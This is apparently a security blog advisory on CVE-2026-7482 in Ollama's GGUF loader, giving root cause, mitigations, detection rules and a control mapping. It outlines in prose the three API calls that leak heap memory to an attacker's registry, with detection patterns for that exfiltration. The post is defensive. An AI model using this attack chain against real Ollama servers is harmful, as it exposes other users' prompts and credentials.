Bleeding Llama: CVE-2026-7482 and what Ollama’s GGUF loader hands an attacker

By Robert Weber · 0 days ago 10 May 2026

Ollama 0.17.1 shipped on May 1, 2026 and the patch notes do not exactly scream at you about what it fixes. The PR (GitHub #14406, commit 88d57d04) is a small change in the GGUF tensor path. The bug it closes — CVE-2026-7482, branded “Bleeding Llama” by Cyera — is a network-reachable, unauthenticated heap out-of-bounds read in the model creation flow that turns a self-hosted inference box into a leak source for other users’ prompts, the system prompts of other loaded models, and, depending on how the process was started, every environment variable in the process — which on real deployments means API keys for the upstream model providers, registry credentials, and whatever the cloud metadata service handed the host at boot. CVSS 9.1, network vector, no auth, no user interaction. If you run Ollama with OLLAMA_HOST=0.0.0.0 anywhere — and a lot of you do — this is the one to drop other work for.

The bug, in the smallest number of words

The loader in fs/ggml/gguf.go and the quantization path in server/quantization.go (the WriteTo() flow, specifically ConvertToF32) trust the tensor metadata in an uploaded GGUF file. The tensor shape dimensions are multiplied together to derive an element count, and the element count drives the read loop straight into the in-memory buffer. There is no check that the backing buffer actually contains that many bytes.

So if I declare a shape that implies a million F16 elements but ship you a 4 KB blob, the loop walks off the end of my allocation and into whatever lives next to it on the heap. Source dtype is F16, target is F32. That conversion is lossless. Adjacent heap memory survives byte-for-byte into the output tensor.

Then I call /api/push to a registry I control, and the leaked bytes ride out in the model artifact.

Three HTTP calls. /api/blobs to stage, /api/create with the malicious manifest, /api/push to ship. The name field on create is a URI pointing at the attacker registry — that’s the exfil channel built right into the protocol.

Why this is worse than the average heap OOB read

Most OOB-read bugs in a process need an oracle — some channel that turns the leaked bytes into observable behavior. Here the oracle is the product. You ask Ollama to write a model file, it writes one. The leak is the file. There’s no timing side-channel to massage, no error-message regex to parse, no remote-allocator dance. The contents are non-deterministic (you get whatever the allocator happened to place adjacent), but Cyera’s PoC — Dor Attias, who reported it — shows that on a busy server with concurrent users you reliably pull prompts and message bodies out of other sessions. Iterate a few times and you get system prompts for other loaded models. Iterate more and you get the process environment.

That last part is the one that should bother you most. OLLAMA_* env vars, sure, but also whatever the container runtime injected — AWS_*, GOOGLE_APPLICATION_CREDENTIALS paths, registry pull secrets that some helpful Helm chart pasted in as plaintext, the IMDSv2 token if somebody re-exported it for a sidecar. The blast radius depends entirely on how your platform team launches the process, and in practice that means it depends on whether anyone reviewed the unit file or the Deployment manifest after the original author left.

How exposed are you, actually

Ollama binds to 127.0.0.1 by default. The docs are clear about this. In production almost nobody runs it that way for long. Internal platform teams flip OLLAMA_HOST=0.0.0.0 because the inference box has to serve a fleet of notebooks. Researchers port-forward the GPU workstation to their laptop and forget to undo it. The “AI sidecar” pattern — Ollama on an EC2 instance with a public IP and a security group somebody opened for “testing” — is depressingly common. Public scans at disclosure time were finding roughly 300,000 reachable Ollama endpoints on the internet, and in the first weeks after the fix the majority were still pre-0.17.1.

So: assume internet-reachable until proven otherwise, and assume that proof is harder than ss -tlnp on one host.

What to do this week

Upgrade to 0.17.1. That is the only durable fix and it is not negotiable — input validation on attacker-controlled tensor metadata is the whole bug; you cannot mitigate around it cleanly.

If you cannot patch immediately (image rebuild pipeline is slow, some downstream pinning, the usual), the stopgaps in rough order of effectiveness:

Revert the bind. OLLAMA_HOST=127.0.0.1 and put an authenticated reverse proxy in front. nginx with mTLS or a short OIDC sidecar is fine; the point is that /api/create should never be reachable without an identity attached. (AC-3, SC-7.)
Block /api/push at the proxy if you do not actually publish models from this host. Kills the primary exfil path. The attacker can still leak via a creative manifest, but you have removed the easy mode.
Egress controls on the GPU host. Allowlist the registries you actually push to. Outbound HTTPS from a GPU inference node to arbitrary hosts is not a normal pattern and should not be one. (AC-4, SC-7.)
Segment. The GPU box should not sit on the same L2 as your secrets manager or your build agents. I have seen exactly this layout on shared internal AI clusters and it makes a 9.1 worse.

Detections that survive contact with real traffic

A few things worth wiring up. None of these are clean — expect tuning.

The strongest signal is a /api/create request whose declared tensor-shape product, multiplied by the element size, exceeds the size of the blob it references. That’s the bug condition expressed as a log query. You need the request body captured and parsed, which in practice means terminating TLS at a proxy that logs it; the Ollama process itself does not emit this. In Splunk you can carve it from an HTTP access sourcetype if you wrote a props.conf that pulls the JSON body, which most people did not. The Elastic equivalent is messier because the ingest pipeline for arbitrary JSON bodies tends to choke on tensor shape arrays of mixed depth.

A cheaper proxy signal: /api/create followed within the same session by /api/push to a host not on your registry allowlist. Low volume on a normal inference box, near-zero false positives once you carve out your own CI pushes. (AU-2, AU-6.)

A dumb but useful one: model names submitted to /api/create that contain an http:// or https:// scheme prefix. Legitimate model names rarely do. Expect a handful of false positives from people pasting Hugging Face URLs into the wrong field; that is fine, those are conversations worth having anyway.

Finally, outbound traffic from the GPU subnet to registries that are not on the allowlist. This is where you actually see exfiltration if the earlier signals missed it — and you should treat the GPU egress allowlist as load-bearing detection, not just policy.

One caveat worth being honest about: prompts and system messages leaking through model artifacts will not look like a normal data-loss pattern to a DLP product. You are not exfiltrating a CSV. You are exfiltrating a binary tensor blob whose interior happens to contain ASCII fragments. Most DLP rules will miss it.

Control mapping

Control	Where it bites
SI-2	Patch to 0.17.1. The fix exists; apply it.
SI-10	Root cause — the loader trusts attacker-supplied tensor metadata to size a buffer read.
AC-3 / AC-4	`/api/create` has no auth; `/api/push` is an information-flow path out of the trust boundary.
SC-7	`0.0.0.0` binding without an authenticated front door is the exposure shape.
SC-8	Heap contents leaving the host inside a model artifact is the confidentiality break.
AU-2 / AU-6	Detection requires request bodies you may not currently log.
SA-15	Self-hosted AI runtimes are a supply-chain element; treat them like one.

Do not stretch the mapping further than that. Bleeding Llama is fundament— it’s a memory-safety bug at the parser boundary, dressed up in an AI-shaped wrapper. Treat it as one.

The wider point

GGUF parsers are going to keep producing bugs like this. The format is permissive, the metadata is structural, and a lot of the runtimes — Ollama, llama.cpp, the various downstream forks — share lineage in the parsing code. If you accept user-supplied GGUF on a network endpoint, you have signed up for an attack surface that looks a lot more like a media codec from 2008 than like a model server. Plan for the next one.

Upgrade. Close the egress. Log the bodies you need to detect this class.